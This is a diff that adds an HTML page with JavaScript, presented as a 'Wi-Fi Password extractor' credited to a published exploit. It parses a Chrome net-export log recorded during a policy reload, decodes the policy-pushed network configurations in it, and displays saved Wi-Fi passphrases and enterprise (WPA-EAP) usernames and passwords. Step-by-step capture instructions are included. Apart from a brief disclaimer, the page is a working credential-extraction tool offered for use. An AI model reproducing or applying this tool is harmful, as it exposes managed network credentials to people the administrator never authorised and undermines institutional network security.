@@ -1,0 +1,65 @@
+<head><meta name="color-scheme" content="light dark"></head>
+
+<body style="font-family:monospace;">
+    <h1>Welcome to the No Name Games Wi-Fi Password extractor!</h1>
+    <h2>Credits to <b>luphoria</b> for finding the original exploit.</h2>
+    <h2>⚠️ LEGAL DESCLAIMER: Do not use this without explicit permission from the Wi-Fi owner! I am not responsible for any illegal use of this tool. It should only be used for educational and or penetration testing uses.</h2>
+    chrome-net-export-log.json - <input type="file" id="export">
+    <script>
+      let extract = (event) => {
+        let file = event.target.files[0];
+        let reader = new FileReader();
+        reader.readAsText(file);
+        reader.onload = (e) => {
+          let netlog = e.target.result;
+          let split_netlog = netlog.split("\n");
+          let policyNets = [];
+          for (let i = 0; i < split_netlog.length; i++) {
+            if (split_netlog[i].includes("ya0NvbmZpZ3VyYXRpb2") || split_netlog[i].includes("vcmtDb25maWd1cmF0aW") || split_netlog[i].includes("rQ29uZmlndXJhdGlvbn") || split_netlog[i].includes("Db25maWd1cmF0aW9ucw")) {
+              policyNets.push(split_netlog[i]);
+            }
+          }
+          policyNets.forEach(policyNet => {
+            try {
+              policyNet = atob(policyNet.substring((policyNet.indexOf('"bytes":"') + 9), (policyNet.indexOf('"},"phase"'))));
+              let NetworkConfigurations = policyNet.substring(policyNet.indexOf('"NetworkConfigurations":'), policyNet.indexOf("]\n}b")) + "]";
+              NetworkConfigurations = NetworkConfigurations.substring(0, NetworkConfigurations.search(/}\n *]/));
+              NetworkConfigurations = NetworkConfigurations.replace(/("NetworkConfigurations":|\n)/g, "") + "}]";
+              eval("NetworkConfigurations = " + NetworkConfigurations);
+              for (wifi in NetworkConfigurations) {
+                if (NetworkConfigurations[wifi]["Type"] != "WiFi") continue; // Skip non WiFi networks such as Ethernet
+                let tr = document.createElement("tr");
+                let SSID = document.createElement("td");
+                SSID.innerText = NetworkConfigurations[wifi]["WiFi"]["SSID"];
+                let Security = document.createElement("td");
+                Security.innerText = NetworkConfigurations[wifi]["WiFi"]["Security"];
+                let Passphrase = document.createElement("td");
+                if (NetworkConfigurations[wifi]["WiFi"]["Passphrase"]) {
+                  Passphrase.innerText = NetworkConfigurations[wifi]["WiFi"]["Passphrase"]
+                } else if (Security.innerText == "WPA-EAP" && NetworkConfigurations[wifi]["WiFi"]["EAP"]["Password"]) {
+                  Passphrase.innerText = "Identity: " + NetworkConfigurations[wifi]["WiFi"]["EAP"]["Identity"] + "\nPassword: " + NetworkConfigurations[wifi]["WiFi"]["EAP"]["Password"];
+                } else Passphrase.innerText = "NOT FOUND";
+                let HiddenSSID = document.createElement("td");
+                HiddenSSID.innerText = NetworkConfigurations[wifi]["WiFi"]["HiddenSSID"];
+                tr.appendChild(SSID);
+                tr.appendChild(Passphrase);
+                tr.appendChild(Security);
+                tr.appendChild(HiddenSSID);
+                document.getElementById("output-networks").appendChild(tr);
+              }
+            } catch (err) {}
+          })
+        }
+      }
+      document.getElementById("export").addEventListener("change", extract)
+    
+    </script>
+    <h1>Steps to use</h1>
+<p>- Go to chrome://net-export<br/>
+- Under "OPTIONS" <b>make sure</b> to check "Include raw bytes"<br/>
+- Click "Start Logging to Disk"<br/>
+- Go to chrome://policy<br/>
+- Click "Reload Policies"<br/>
+- Go back to chrome://net-export and click "Stop Logging"<br/>
+- Upload file above</p>
+</body>
